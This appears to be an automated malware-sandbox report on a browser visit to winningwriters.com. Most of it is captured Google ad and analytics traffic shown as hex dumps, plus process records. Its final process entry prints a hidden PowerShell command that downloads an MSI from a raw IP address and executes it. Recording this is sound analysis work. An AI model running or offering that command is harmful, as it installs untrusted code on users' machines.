                                                                                                                                                                                            2024-11-18 20:00:42 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:42 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:42 UTC79INData Raw: 76 47 4c 41 62 57 36 61 32 50 6e 35 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 31 39 34 35 38 37 31 39 36 33 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: vGLAbW6a2Pn5\x26random\x3d1945871963\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            146192.168.2.1649885142.250.186.1324436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:43 UTC1246OUTGET /pagead/1p-user-list/1072733940/?random=1731960038420&cv=11&fst=1731960000000&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Origin%20Story%20by%20Jendi%20Reiter&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQCa7L7d7O67Cfg3AuzL-pZeDczgnCHbGjRKxwL7-o-biBakD5Tu0ox9&random=34939820&rmt_tld=0&ipr=y HTTP/1.1
                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:43 UTC602INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:43 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Content-Type: image/gif
                                                                                                                                                                                            Content-Security-Policy: script-src 'none'; object-src 'none'
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            Content-Length: 42
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            2024-11-18 20:00:43 UTC42INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 00 00 00 ff ff ff 21 f9 04 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 01 44 00 3b
                                                                                                                                                                                            Data Ascii: GIF89a!,D;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            147192.168.2.1649886216.239.34.1814436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:44 UTC1349OUTPOST /g/collect?v=2&tid=G-S2XE0RVPX9&gtm=45je4be0v889608727z8846709124za200zb846709124&_p=1731960005145&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067554~102067808~102077855~102081484&cid=723902191.1731960008&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&pae=1&frm=0&pscdl=noapi&_s=5&sid=1731960008&sct=1&seg=1&dl=https%3A%2F%2Fwinningwriters.com%2F&dt=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&en=slider_change&ep.event_category=Slider&ep.event_label=Ad-Top&ep.value=Origin%20Story%20by%20Jendi%20Reiter&_et=8022&tfd=44230 HTTP/1.1
                                                                                                                                                                                            Host: analytics.google.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Origin: https://winningwriters.com
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:44 UTC849INHTTP/1.1 204 No Content
                                                                                                                                                                                            Access-Control-Allow-Origin: https://winningwriters.com
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:44 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Content-Security-Policy-Report-Only: script-src 'none'; form-action 'none'; frame-src 'none'; report-uri https://csp.withgoogle.com/csp/scaffolding/ascnsrsggc:136:0
                                                                                                                                                                                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to=coop_reporting
                                                                                                                                                                                            Report-To: {"group":"coop_reporting","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/scaffolding/ascnsrsggc:136:0"}],}
                                                                                                                                                                                            Server: Golfe2
                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Connection: close


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            148192.168.2.1649887142.250.186.1624436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:47 UTC1423OUTGET /pagead/viewthroughconversion/1072733940/?random=1731960046417&cv=11&fst=1731960046417&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4 HTTP/1.1
                                                                                                                                                                                            Host: googleads.g.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:48 UTC703INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:47 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:48 UTC675INData Raw: 31 33 31 33 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 73 20 3d 20 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 64 29 7b 69 66 28 61 3d 3d 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 61 3d 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 64 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c
                                                                                                                                                                                            Data Ascii: 1313(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&global
                                                                                                                                                                                            2024-11-18 20:00:48 UTC1378INData Raw: 72 20 63 3d 61 2e 73 70 6c 69 74 28 22 2e 22 29 3b 61 3d 63 2e 6c 65 6e 67 74 68 3d 3d 3d 31 3b 76 61 72 20 65 3d 63 5b 30 5d 2c 67 3b 21 61 26 26 65 20 69 6e 20 74 3f 67 3d 74 3a 67 3d 6d 3b 66 6f 72 28 65 3d 30 3b 65 3c 63 2e 6c 65 6e 67 74 68 2d 31 3b 65 2b 2b 29 7b 76 61 72 20 66 3d 63 5b 65 5d 3b 69 66 28 21 28 66 20 69 6e 20 67 29 29 62 72 65 61 6b 20 61 3b 67 3d 67 5b 66 5d 7d 63 3d 63 5b 63 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 3d 70 26 26 64 3d 3d 3d 22 65 73 36 22 3f 67 5b 63 5d 3a 6e 75 6c 6c 3b 62 3d 62 28 64 29 3b 62 21 3d 6e 75 6c 6c 26 26 28 61 3f 68 28 74 2c 63 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 62 7d 29 3a 62 21 3d 3d 64 26 26 28 76 5b 63 5d 3d 3d 3d 76 6f 69 64 20 30
                                                                                                                                                                                            Data Ascii: r c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0
                                                                                                                                                                                            2024-11-18 20:00:48 UTC1378INData Raw: 4f 66 28 61 29 21 3d 2d 31 7d 3b 66 75 6e 63 74 69 6f 6e 20 54 28 29 7b 72 65 74 75 72 6e 20 47 3f 21 21 4f 26 26 4f 2e 62 72 61 6e 64 73 2e 6c 65 6e 67 74 68 3e 30 3a 21 31 7d 66 75 6e 63 74 69 6f 6e 20 55 28 29 7b 72 65 74 75 72 6e 20 54 28 29 3f 51 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 52 28 22 43 68 72 6f 6d 65 22 29 7c 7c 52 28 22 43 72 69 4f 53 22 29 29 26 26 21 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c 7c 52 28 22 53 69 6c 6b 22 29 7d 3b 21 52 28 22 41 6e 64 72 6f 69 64 22 29 7c 7c 55 28 29 3b 55 28 29 3b 52 28 22 53 61 66 61 72 69 22 29 26 26 28 55 28 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 43 6f 61 73 74 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 4f 70 65 72 61 22 29 29 7c 7c 28 54 28 29 3f 30 3a 52 28 22 45 64 67 65 22 29 29 7c
                                                                                                                                                                                            Data Ascii: Of(a)!=-1};function T(){return G?!!O&&O.brands.length>0:!1}function U(){return T()?Q("Chromium"):(R("Chrome")||R("CriOS"))&&!(T()?0:R("Edge"))||R("Silk")};!R("Android")||U();U();R("Safari")&&(U()||(T()?0:R("Coast"))||(T()?0:R("Opera"))||(T()?0:R("Edge"))|
                                                                                                                                                                                            2024-11-18 20:00:48 UTC1378INData Raw: 26 26 44 2e 73 65 6e 64 42 65 61 63 6f 6e 28 71 29 7d 63 61 74 63 68 28 62 61 29 7b 41 2e 54 41 47 47 49 4e 47 3d 41 2e 54 41 47 47 49 4e 47 7c 7c 5b 5d 2c 41 2e 54 41 47 47 49 4e 47 5b 31 35 5d 3d 21 30 7d 63 61 7c 7c 46 28 71 29 3b 4a 3d 21 30 7d 7d 4a 26 26 65 28 29 7d 7d 28 66 29 29 29 3b 72 2e 6f 6e 6c 6f 61 64 3d 65 3b 72 2e 73 72 63 3d 64 5b 66 2e 67 5d 7d 65 28 29 7d 76 61 72 20 58 3d 5b 22 73 73 5f 22 5d 2c 59 3d 73 7c 7c 7a 3b 58 5b 30 5d 69 6e 20 59 7c 7c 74 79 70 65 6f 66 20 59 2e 65 78 65 63 53 63 72 69 70 74 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 7c 7c 59 2e 65 78 65 63 53 63 72 69 70 74 28 22 76 61 72 20 22 2b 58 5b 30 5d 29 3b 20 66 6f 72 28 76 61 72 20 5a 3b 58 2e 6c 65 6e 67 74 68 26 26 28 5a 3d 58 2e 73 68 69 66 74 28 29 29 3b 29 58 2e
                                                                                                                                                                                            Data Ascii: &&D.sendBeacon(q)}catch(ba){A.TAGGING=A.TAGGING||[],A.TAGGING[15]=!0}ca||F(q);J=!0}}J&&e()}}(f)));r.onload=e;r.src=d[f.g]}e()}var X=["ss_"],Y=s||z;X[0]in Y||typeof Y.execScript=="undefined"||Y.execScript("var "+X[0]); for(var Z;X.length&&(Z=X.shift());)X.
                                                                                                                                                                                            2024-11-18 20:00:48 UTC82INData Raw: 61 74 50 47 33 59 67 79 46 5a 47 45 63 44 39 4a 59 5c 78 32 36 72 61 6e 64 6f 6d 5c 78 33 64 36 35 39 39 36 31 30 30 5c 78 32 36 72 6d 74 5f 74 6c 64 5c 78 33 64 30 5c 78 32 36 69 70 72 5c 78 33 64 79 27 5d 2c 20 5b 5d 29 3b 7d 29 28 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: atPG3YgyFZGEcD9JY\x26random\x3d65996100\x26rmt_tld\x3d0\x26ipr\x3dy'], []);})();
                                                                                                                                                                                            2024-11-18 20:00:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            149192.168.2.1649888142.250.185.1304436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:47 UTC1547OUTGET /td/rul/1072733940?random=1731960046417&cv=11&fst=1731960046417&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top HTTP/1.1
                                                                                                                                                                                            Host: td.doubleclick.net
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlKHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: iframe
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: IDE=AHWqTUkDmVI5SI6spfg_4pFoLRycHAEiplKMEVcXvfQYs0XlPIWpOqdcPgyxfSfi
                                                                                                                                                                                            2024-11-18 20:00:48 UTC646INHTTP/1.1 200 OK
                                                                                                                                                                                            P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                            Timing-Allow-Origin: *
                                                                                                                                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:48 GMT
                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                            Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                            Server: cafe
                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            2024-11-18 20:00:48 UTC18INData Raw: 64 0d 0a 3c 68 74 6d 6c 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                            Data Ascii: d<html></html>
                                                                                                                                                                                            2024-11-18 20:00:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Click to dive into process behavior distribution

                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                            Start time:14:59:57
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                            Start time:14:59:58
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=1944,i,10072944039873156587,3797958150619069762,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                            Target ID:2
                                                                                                                                                                                            Start time:14:59:59
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://winningwriters.com"
                                                                                                                                                                                            Imagebase:0x7ff7f9810000
                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                            Start time:15:01:13
                                                                                                                                                                                            Start date:18/11/2024
                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c start /min powershell -NoProfile -WindowStyle Hidden -Command $path='c:\\users\\public\\2as.msi'; Invoke-RestMethod -Uri 'http://193.188.22.73/a.m' -OutFile $path; Start-Process $path;
                                                                                                                                                                                            Imagebase:0x7ff6fd780000
                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                            Programmed in:C, C++ or other language
